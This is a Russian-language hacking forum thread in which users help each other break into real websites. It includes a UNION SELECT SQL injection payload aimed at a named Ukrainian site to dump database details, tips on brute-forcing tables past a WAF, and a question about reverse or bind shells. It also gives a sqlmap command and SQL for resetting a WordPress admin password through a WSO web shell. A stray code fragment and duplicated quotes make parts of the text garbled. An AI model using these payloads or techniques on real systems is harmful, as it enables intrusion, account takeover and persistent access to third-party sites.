 |
|
23.02.2015, 13:53
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Сообщение от MaxFast
Код:
ukrcrewing.com.ua/agency ('union select 1,concat(database(),0x3a,version(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--')
Спасибо, но это тоже самое но в профиль -) Мне нужен именно список таблиц
|
|
|
23.02.2015, 14:00
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 448
С нами:
8265206
Репутация:
40
|
|
Сообщение от EksTasy
есть ли здесь уязвимость?
Это Opencart, нет ничего.
|
|
|
|
23.02.2015, 14:47
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от Unknowhacker
Спасибо, но это тоже самое но в профиль -) Мне нужен именно список таблиц
waf на точку, у меня обойти не вышло. пробуйте подбирать таблицы перебором
|
|
|
|
23.02.2015, 15:06
|
|
Участник форума
Регистрация: 07.10.2013
Сообщений: 140
С нами:
6630806
Репутация:
6
|
|
Парни,я понял что blind sql injection - это сначала запрос вида
select count(*) from pages where id=...
а потом
select * from pages where id=...
В случае если первый запрос возвращает 0 -происходит редирект.
Вопрос. Как часто происходит редирект в blind sql injection
|
|
|
|
24.02.2015, 21:46
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от huntercs16
Парни,я понял что blind sql injection - это сначала запрос вида
select count(*) from pages where id=...
а потом
select * from pages where id=...
В случае если первый запрос возвращает 0 -происходит редирект.
Вопрос. Как часто происходит редирект в blind sql injection
Ерунду какую-то написал. Твои запросы - это обычная union инъекция. Блайнд - это отсутствие вывода, через select ты ничего не выведешь, ты можешь только проверить истинность или ложность выражения. Учи матчасть.
|
|
|
|
25.02.2015, 11:10
|
|
Новичок
Регистрация: 13.02.2010
Сообщений: 0
С нами:
8547867
Репутация:
0
|
|
Скажите: как мне заюзать бекконект или биндпорт, если shell_exec не работает, а следовательно Perl bind.pl не приводит к нужному результату.
|
|
|
|
26.02.2015, 03:37
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 245
С нами:
8255126
Репутация:
0
|
|
Ребята, как скулмапу скормить урл и если SQL в заголовке урла, как это сделать? Есть примеры?
|
|
|
|
26.02.2015, 04:32
|
|
Постоянный
Регистрация: 27.08.2011
Сообщений: 640
С нами:
7742486
Репутация:
72
|
|
Сообщение от preno
Ребята, как скулмапу скормить урл и если SQL в заголовке урла, как это сделать? Есть примеры?
./sqlmap.py --headers=" User-Agent: Mozilla/5.0 Gecko/20120101 Firefox/26.0" --cookie=" %Query_Cookie%" -u ' http://url.com/path/?id=1' --level=5 risk=3 -p %Parametr%
Или
-r и путь к файлу с HTTP запросом
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]POST[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]vuln[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php HTTP[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.1
Host[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]target[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com
User[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Agent[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Mozilla[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]4.0
id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][/COLOR]
|
|
|
|
26.02.2015, 11:37
|
|
Познающий
Регистрация: 15.09.2013
Сообщений: 68
С нами:
6662486
Репутация:
0
|
|
Ребят , какой запрос в wso shell сделать , чтобы поменять Пароль в mysql базе . Допустим wordpress password "user_pass"
|
|
|
|
26.02.2015, 12:27
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от yeti2
Ребят , какой запрос в wso shell сделать , чтобы поменять Пароль в mysql базе . Допустим wordpress password "user_pass"
Сразу задавайте вопросы в соответвствующей теме.
Strilo4ka вчера Вам отвечал:
Сообщение от None
Сообщение от yeti2
как в wso shell'е заменить пароль в mysql wordpress базе. user_pass на свой
Код:
update `wp_users` set `user_pass`='$P$B7Ksq0R9XEPqj/ZD1/YOmG4TzToS24/' where id=1
update `wp_users` set `user_pass`= md5('123') where id=1
только Вы немного темой ошиблись.
" if author else f"
Сообщение от yeti2
как в wso shell'е заменить пароль в mysql wordpress базе. user_pass на свой
Код:
update `wp_users` set `user_pass`='$P$B7Ksq0R9XEPqj/ZD1/YOmG4TzToS24/' where id=1
update `wp_users` set `user_pass`= md5('123') where id=1
только Вы немного темой ошиблись.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
